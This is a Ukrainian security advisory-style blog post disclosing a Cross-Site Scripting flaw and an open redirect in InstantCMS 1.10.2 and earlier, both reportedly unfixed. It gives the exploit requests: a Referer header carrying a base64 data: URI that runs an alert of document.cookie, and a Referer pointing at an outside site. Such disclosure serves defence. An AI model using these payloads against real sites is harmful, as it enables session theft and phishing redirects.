Уразливості в InstantCMS
23:59 17.09.201317.07.2013
У липні, 14.07.2013, я знайшов Cross-Site Scripting та Redirector уразливості в InstantCMS. Про що найближчим часом повідомлю розробникам системи.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.
17.09.2013
Cross-Site Scripting (WASC-08):
GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.
Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Redirector (URL Redirector Abuse) (WASC-38):
GET запит до http://site/modules/mod_template/set.php з вказанням заголовку Referer.
Referer: http://websecurity.com.ua
Вразливі InstantCMS 1.10.2 та попередні версії.
Дані уразливості досі не виправлені.